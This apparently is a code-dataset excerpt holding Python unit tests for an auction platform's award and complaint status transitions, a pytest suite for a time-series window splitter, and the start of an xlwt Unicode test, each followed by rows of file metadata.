self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
auction = self.db.get(self.auction_id)
auction['awards'][0]['signingPeriod']['endDate'] = auction['awards'][0]['signingPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
class AuctionAwardSwitch2ResourceTest(BaseAuctionWebTest):
initial_status = 'active.auction'
initial_bids = [
{
"tenderers": [
test_organization
],
"value": {
"amount": 101 * (i + 1),
"currency": "UAH",
"valueAddedTaxIncluded": True
},
'qualified': True
}
for i in range(2)
]
def setUp(self):
super(AuctionAwardSwitch2ResourceTest, self).setUp()
authorization = self.app.authorization
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': {'bids': self.initial_bids}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertEqual('active.qualification', auction["status"])
self.award = self.first_award = auction['awards'][0]
self.second_award = auction['awards'][1]
self.award_id = self.first_award_id = self.first_award['id']
self.second_award_id = self.second_award['id']
self.app.authorization = authorization
def test_switch_verification_to_unsuccessful(self):
auction = self.db.get(self.auction_id)
auction['awards'][0]['verificationPeriod']['endDate'] = auction['awards'][0]['verificationPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
self.assertEqual(auction['status'], 'unsuccessful')
self.assertIn('endDate', auction['awardPeriod'])
def test_switch_payment_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
auction = self.db.get(self.auction_id)
auction['awards'][0]['paymentPeriod']['endDate'] = auction['awards'][0]['paymentPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
self.assertEqual(auction['status'], 'unsuccessful')
self.assertIn('endDate', auction['awardPeriod'])
def test_switch_active_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
auction = self.db.get(self.auction_id)
auction['awards'][0]['signingPeriod']['endDate'] = auction['awards'][0]['signingPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
self.assertEqual(auction['status'], 'unsuccessful')
self.assertIn('endDate', auction['awardPeriod'])
@unittest.skip("option not available")
class AuctionLotAuctionPeriodResourceTest(AuctionAuctionPeriodResourceTest):
initial_lots = test_lots
class AuctionComplaintSwitchResourceTest(BaseAuctionWebTest):
def test_switch_to_pending(self):
response = self.app.post_json('/auctions/{}/complaints'.format(self.auction_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_organization,
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
auction = self.db.get(self.auction_id)
auction['complaints'][0]['dateSubmitted'] = (get_now() - timedelta(days=1 if 'procurementMethodDetails' in auction else 4)).isoformat()
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/auctions/{}/complaints'.format(self.auction_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_organization,
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/auctions/{}/complaints/{}?acc_token={}'.format(self.auction_id, complaint['id'], self.auction_token), {"data": {
"status": "answered",
"resolution": status * 4,
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
auction = self.db.get(self.auction_id)
auction['complaints'][-1]['dateAnswered'] = (get_now() - timedelta(days=1 if 'procurementMethodDetails' in auction else 4)).isoformat()
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][-1]['status'], status)
@unittest.skip("option not available")
class AuctionLotComplaintSwitchResourceTest(AuctionComplaintSwitchResourceTest):
initial_lots = test_lots
@unittest.skip("option not available")
class AuctionAwardComplaintSwitchResourceTest(BaseAuctionWebTest):
initial_status = 'active.qualification'
initial_bids = test_bids
def setUp(self):
super(AuctionAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/auctions/{}/awards'.format(
self.auction_id), {'data': {'suppliers': [self.initial_organization], 'status': 'pending', 'bid_id': self.initial_bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
def test_switch_to_pending(self):
response = self.app.post_json('/auctions/{}/awards/{}/complaints'.format(self.auction_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_organization,
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
auction = self.db.get(self.auction_id)
auction['awards'][0]['complaints'][0]['dateSubmitted'] = (get_now() - timedelta(days=1 if 'procurementMethodDetails' in auction else 4)).isoformat()
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/auctions/{}/awards/{}/complaints'.format(self.auction_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_organization,
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(self.auction_id, self.award_id, complaint['id'], self.auction_token), {"data": {
"status": "answered",
"resolution": status * 4,
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
auction = self.db.get(self.auction_id)
auction['awards'][0]['complaints'][-1]['dateAnswered'] = (get_now() - timedelta(days=1 if 'procurementMethodDetails' in auction else 4)).isoformat()
self.db.save(auction)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][-1]['status'], status)
@unittest.skip("option not available")
class AuctionLotAwardComplaintSwitchResourceTest(AuctionAwardComplaintSwitchResourceTest):
initial_lots = test_lots
def setUp(self):
super(AuctionAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/auctions/{}/awards'.format(self.auction_id), {'data': {
'suppliers': [self.initial_organization],
'status': 'pending',
'bid_id': self.initial_bids[0]['id'],
'lotID': self.initial_bids[0]['lotValues'][0]['relatedLot']
}})
award = response.json['data']
self.award_id = award['id']
class AuctionDontSwitchSuspendedAuction2ResourceTest(BaseAuctionWebTest):
initial_bids = test_bids
def test_switch_suspended_auction_to_auction(self):
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': True}})
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']["status"], "active.auction")
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': False}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class AuctionDontSwitchSuspendedAuctionResourceTest(BaseAuctionWebTest):
initial_status = 'active.auction'
initial_bids = test_bids
def setUp(self):
super(AuctionDontSwitchSuspendedAuctionResourceTest, self).setUp()
authorization = self.app.authorization
self.app.authorization = ('Basic', ('auction', ''))
now = get_now()
auction_result = {
'bids': [
{
"id": b['id'],
"date": (now - timedelta(seconds=i)).isoformat(),
"value": b['value']
}
for i, b in enumerate(self.initial_bids)
]
}
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertEqual('active.qualification', auction["status"])
self.award = self.first_award = auction['awards'][0]
self.second_award = auction['awards'][1]
self.award_id = self.first_award_id = self.first_award['id']
self.second_award_id = self.second_award['id']
self.app.authorization = authorization
def test_switch_suspended_verification_to_unsuccessful(self):
auction = self.db.get(self.auction_id)
auction['awards'][0]['verificationPeriod']['endDate'] = auction['awards'][0]['verificationPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': True}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'pending.verification')
self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': False}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
def test_switch_suspended_payment_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
auction = self.db.get(self.auction_id)
auction['awards'][0]['paymentPeriod']['endDate'] = auction['awards'][0]['paymentPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': True}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'pending.payment')
self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': False}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
def test_switch_suspended_active_to_unsuccessful(self):
bid_token = self.initial_bids_tokens[self.award['bid_id']]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1]
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "pending.payment")
response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
auction = self.db.get(self.auction_id)
auction['awards'][0]['signingPeriod']['endDate'] = auction['awards'][0]['signingPeriod']['startDate']
self.db.save(auction)
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': True}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'active')
self.assertEqual(auction['contracts'][0]['status'], 'pending')
self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
self.assertEqual(auction['status'], 'active.awarded')
self.assertIn('endDate', auction['awardPeriod'])
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': False}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
auction = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
self.assertEqual(auction['status'], 'active.qualification')
self.assertNotIn('endDate', auction['awardPeriod'])
class FinancialAuctionSwitchQualificationResourceTest(AuctionSwitchQualificationResourceTest):
initial_bids = test_financial_bids[:1]
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
class FinancialAuctionSwitchAuctionResourceTest(AuctionSwitchAuctionResourceTest):
initial_bids = test_financial_bids
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
class FinancialAuctionSwitchUnsuccessfulResourceTest(AuctionSwitchUnsuccessfulResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchQualificationResourceTest(AuctionLotSwitchQualificationResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchAuctionResourceTest(AuctionLotSwitchAuctionResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchUnsuccessfulResourceTest(AuctionLotSwitchUnsuccessfulResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
class FinancialAuctionAuctionPeriodResourceTest(AuctionAuctionPeriodResourceTest):
initial_bids = test_financial_bids
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotAuctionPeriodResourceTest(AuctionLotAuctionPeriodResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
class FinancialAuctionComplaintSwitchResourceTest(AuctionComplaintSwitchResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotComplaintSwitchResourceTest(AuctionLotComplaintSwitchResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionAwardComplaintSwitchResourceTest(AuctionAwardComplaintSwitchResourceTest):
initial_bids = test_financial_bids
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotAwardComplaintSwitchResourceTest(AuctionLotAwardComplaintSwitchResourceTest):
initial_data = test_financial_auction_data
initial_organization = test_financial_organization
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AuctionAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(AuctionComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(AuctionLotAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(AuctionLotComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(AuctionLotSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(AuctionLotSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(AuctionLotSwitchUnsuccessfulResourceTest))
suite.addTest(unittest.makeSuite(AuctionSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(AuctionSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(AuctionSwitchUnsuccessfulResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionLotAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionLotComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionLotSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionLotSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionLotSwitchUnsuccessfulResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(FinancialAuctionSwitchUnsuccessfulResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 54.313466
| 194
| 0.661193
| 5,059
| 49,208
| 6.303815
| 0.039534
| 0.091248
| 0.108181
| 0.048258
| 0.856637
| 0.846602
| 0.841617
| 0.829576
| 0.822081
| 0.809821
| 0
| 0.01356
| 0.171212
| 49,208
| 905
| 195
| 54.373481
| 0.768408
| 0.000955
| 0
| 0.808
| 0
| 0
| 0.216246
| 0.024249
| 0
| 0
| 0
| 0
| 0.310667
| 1
| 0.033333
| false
| 0
| 0.005333
| 0
| 0.138667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90f19b5ac44e535e444277cc315deb13a44860e6
| 2,717
|
py
|
Python
|
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | null | null | null |
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | 7
|
2021-08-04T18:10:55.000Z
|
2021-08-21T20:36:59.000Z
|
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | 2
|
2021-08-11T05:58:46.000Z
|
2021-12-17T22:09:59.000Z
|
import numpy as np
import pandas as pd
import pytest
from tsfeast.splitter import EndogSeriesWindows, TimeSeriesWindows
class TestTimeSeriesWindows:
def test_split_sets(self, endog_uni, exog):
tsw = TimeSeriesWindows(train_length=3, test_length=1, gap_length=0)
windows = tsw.split(endog_uni, exog)
for w in windows:
assert len(w) == 4
@pytest.mark.parametrize(
'train_length, test_length', [
(2, 1),
(3, 1),
(3, 2)
]
)
def test_num_splits(self, endog_uni, exog, train_length, test_length):
tsw = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=0)
windows = tsw.split(endog_uni, exog)
assert len(windows) == (len(endog_uni) - train_length - (test_length - 1))
@pytest.mark.parametrize(
'train_length, test_length, gap_length', [
(2, 1, 1),
(3, 1, 2),
(3, 2, 1)
]
)
def test_gap_n_splits(self, endog_uni, exog, train_length, test_length, gap_length):
tsw = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
windows = tsw.split(endog_uni, exog)
assert len(windows) == (len(endog_uni) - (train_length + gap_length) - (test_length - 1))
@pytest.mark.parametrize(
'train_length, test_length, gap_length', [
(2, 1, 1),
(3, 1, 2),
(3, 2, 0)
]
)
def test_split_shape(self, endog_uni, exog, train_length, test_length, gap_length):
tsw = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
windows = tsw.split(endog_uni, exog)
for split in windows:
x_train, x_test, y_train, y_test = split
assert x_train.shape[0] == train_length
assert x_test.shape[0] == test_length
assert y_train.shape[0] == train_length
assert y_test.shape[0] == test_length
@pytest.mark.parametrize(
'train_length, test_length, gap_length', [
(2, 1, 1),
(3, 1, 2),
(3, 2, 0)
]
)
def test_gap_exists(self, endog_uni, exog, train_length, test_length, gap_length):
tsw = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
windows = tsw.split(endog_uni, exog)
for split in windows:
x_train, x_test, y_train, y_test = split
assert (x_train.index[-1] + pd.tseries.offsets.MonthEnd(1+gap_length)) == x_test.index[0]
assert (y_train.index[-1] + pd.tseries.offsets.MonthEnd(1 + gap_length)) == y_test.index[0]
| 38.814286
| 106
| 0.620169
| 362
| 2,717
| 4.383978
| 0.138122
| 0.145558
| 0.181474
| 0.172023
| 0.802773
| 0.777568
| 0.745432
| 0.717076
| 0.717076
| 0.666037
| 0
| 0.025138
| 0.267943
| 2,717
| 69
| 107
| 39.376812
| 0.77275
| 0
| 0
| 0.435484
| 0
| 0
| 0.050055
| 0
| 0
| 0
| 0
| 0
| 0.145161
| 1
| 0.080645
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2928962c75bf68a1bae5cdcfe71fdcaf1fd24069
| 4,930
|
py
|
Python
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
# coding:utf-8
import sys
import unittest
from xlwt.UnicodeUtils import upack1, upack2, upack2rt
class TestUpack(unittest.TestCase):
def test_upack1(self):
result = b'\x1d\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack1(u"abcdefghijklmnopqrstuvwxyzÖÄÜ")
self.assertEqual(ustr, result)
